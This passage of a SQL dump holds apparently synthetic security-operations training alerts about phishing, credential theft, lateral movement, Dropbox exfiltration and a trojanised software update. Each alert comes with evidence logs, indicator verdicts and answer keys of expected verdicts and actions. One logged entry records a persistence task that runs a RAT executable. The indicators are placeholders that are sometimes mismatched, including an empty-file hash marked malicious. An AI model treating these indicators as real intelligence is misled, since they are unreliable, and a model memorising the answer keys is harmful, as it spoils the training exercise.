3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.828Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"EventID\\\":4698,\\\"TaskCategory\\\":\\\"Scheduled Task Created\\\",\\\"ProviderName\\\":\\\"Microsoft-Windows-Security-Auditing\\\",\\\"TimeCreated\\\":\\\"2023-10-20T14:22:15.000Z\\\",\\\"EventRecordID\\\":123456,\\\"ProcessName\\\":\\\"schtasks.exe\\\",\\\"UserData\\\":{\\\"TaskName\\\":\\\"\\\\\\\\LeafminerPersistenceTask\\\",\\\"TaskContent\\\":{\\\"Command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"Arguments\\\":\\\"/c C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\leafminer_rat.exe\\\"}},\\\"ExecutionInfo\\\":{\\\"CreatorUser\\\":\\\"compromised_user\\\",\\\"CreatorDomain\\\":\\\"CORP\\\"},\\\"NetworkInfo\\\":{\\\"SourceIP\\\":\\\"10.0.0.15\\\",\\\"AttackerIP\\\":\\\"203.0.113.45\\\"},\\\"FileHash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"FileName\\\":\\\"leafminer_rat.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1112, 'Lateral Movement with Stolen Credentials', 'high', 'Active Directory Logs', 'Leafminer utilized stolen credentials to move laterally across the network, accessing sensitive resources and attempting to escalate privileges.', 'Credential Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":4624,\"logon_type\":3,\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"domain\":\"CORP\",\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"logon_status\":\"0x0\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual login pattern detected\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"DLL used in lateral movement attempts\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(1113, 'Exfiltration via Dropbox C2 Channel', 'high', 'Network Traffic Analysis', 'Leafminer group detected exfiltrating sensitive data using Dropbox as a C2 channel. This communication was disguised to appear legitimate, but analysis revealed indicators consistent with malicious activity.', 'Data Exfiltration', 'T1030: Data Transfer Size Limits', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"src_ip\":\"10.0.0.45\",\"dest_ip\":\"198.51.100.23\",\"src_port\":\"44567\",\"dest_port\":\"443\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_data_backup.zip\",\"file_hash\":\"6c1b2f3e4d5a678b9c0d123456789abc\",\"user\":\"jdoe\",\"action\":\"upload\",\"application\":\"Dropbox\",\"http_host\":\"api.dropboxapi.com\",\"user_agent\":\"DropboxClient/123.45.6\"}', '2026-02-01 13:57:07', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for communication.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Leafminer activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data_backup.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File matches naming patterns of exfiltrated data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6c1b2f3e4d5a678b9c0d123456789abc\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltrated payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_records\",\"verdict\":\"internal\",\"details\":\"Internal 
user account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1114, 'Phishing Email Detected: Fake Conference Invitation', 'medium', 'Email Gateway Logs', 'A phishing email campaign targeting Israeli academics and defense officials has been detected. The emails, posing as legitimate conference invitations, contain a link to a credential harvesting page. The objective is to trick recipients into revealing their credentials.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"12345abcde\",\"sender\":\"conference2023@fake-event.org\",\"recipient\":\"john.doe@university.ac.il\",\"subject\":\"Invitation to International Science Conference 2023\",\"email_server\":\"smtp.fake-event.org\",\"source_ip\":\"203.0.113.45\",\"attachment\":\"Conference_Agenda.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_link\":\"http://malicious-website.com/login\",\"internal_ip\":\"192.168.1.25\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign source IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No associated malware detected.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"PhishTank\",\"verdict\":\"malicious\",\"details\":\"Credential harvesting site.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"conference2023@fake-event.org\",\"is_critical\":true,\"osint_result\":{\"source\":\"SPAMhaus\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing 
campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected: Fake Conference Invitation\",\"date\":\"2026-02-01T20:32:22.833Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1115, 'Malicious Link Analysis: Credential Harvesting Page', 'medium', 'Web Traffic Analysis', 'Upon clicking the link in the email, targets are redirected to a counterfeit website that mimics a well-known academic conference. This site is designed to trick users into entering their login credentials, which are then captured by the attackers.', 'Execution', 'T1204.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"referrer\":\"http://phishing-academics.com/login\",\"email_sender\":\"notify@academia-conference.com\",\"recipient_email\":\"j.doe@university.edu\",\"malicious_url\":\"http://phishing-academics.com/login\",\"http_method\":\"GET\",\"status_code\":200,\"content_type\":\"text/html\",\"username\":\"j.doe\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-academics.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"URL is a known phishing site mimicking academic conference logins\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"notify@academia-conference.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email domain not associated with legitimate conferences\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to have visited a malicious 
site\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.834Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"referrer\\\":\\\"http://phishing-academics.com/login\\\",\\\"email_sender\\\":\\\"notify@academia-conference.com\\\",\\\"recipient_email\\\":\\\"j.doe@university.edu\\\",\\\"malicious_url\\\":\\\"http://phishing-academics.com/login\\\",\\\"http_method\\\":\\\"GET\\\",\\\"status_code\\\":200,\\\"content_type\\\":\\\"text/html\\\",\\\"username\\\":\\\"j.doe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1116, 'Persistence Attempt Detected: Credential Use', 'medium', 'Account Login Logs', 'An attacker used harvested credentials to perform multiple login attempts across university and defense-related platforms. The aim is to establish persistent access within these networks.', 'Persistence', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:01Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"jdoe\",\"event_type\":\"login_attempt\",\"platform\":\"university-portal\",\"success\":false,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"credential_use_attempt\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"malicious_payload.exe\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP used in previous APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal university server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalSecurityDB\",\"verdict\":\"suspicious\",\"details\":\"Multiple failed login attempts recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDB\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareRepository\",\"verdict\":\"malicious\",\"details\":\"File frequently used in credential theft 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.835Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:01Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"event_type\\\":\\\"login_attempt\\\",\\\"platform\\\":\\\"university-portal\\\",\\\"success\\\":false,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"action\\\":\\\"credential_use_attempt\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"malicious_payload.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1117, 'Unusual Data Movement: Potential Lateral Movement', 'high', 'Network Traffic Analysis', 'Anomalous network traffic detected involving potential lateral movement from a compromised host within the network to another internal system. The attacker appears to be using a known malicious IP to transfer data and execute commands on a secondary system.', 'Lateral Movement', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:33:45Z\",\"source_ip\":\"192.168.5.10\",\"destination_ip\":\"192.168.7.25\",\"external_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_script.ps1\",\"username\":\"jdoe\",\"action\":\"File Transfer\",\"status\":\"Success\",\"description\":\"Suspicious file transfer observed from 192.168.5.10 to 192.168.7.25 using an external IP as a proxy.\"}', '2026-02-01 13:57:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Identified as a compromised internal host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with lateral movement activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint 
Detection\",\"verdict\":\"suspicious\",\"details\":\"PowerShell script often used in lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1118, 'Suspicious Software Installation Detected', 'medium', 'Endpoint Detection and Response (EDR) system', 'A suspicious software installation was detected on an endpoint within the network. The RTM Group has successfully infiltrated the financial institution\'s network by embedding their trojan in a popular accounting software update. This action was aimed at deceiving users into granting initial access.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"software_installation\",\"host_ip\":\"192.168.5.14\",\"username\":\"jdoe\",\"software_name\":\"AccountingPro Update\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_path\":\"C:\\\\Program Files\\\\AccountingPro\\\\update.exe\",\"attacker_ip\":\"203.0.113.45\",\"process_id\":5678,\"criticality\":\"medium\",\"description\":\"Installation of suspicious software update detected on host 192.168.5.14 by user jdoe. The software was downloaded from a malicious source associated with RTM Group.\"}', '2026-02-01 13:57:41', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the individual who initiated the suspicious installation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by the RTM Group.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat 
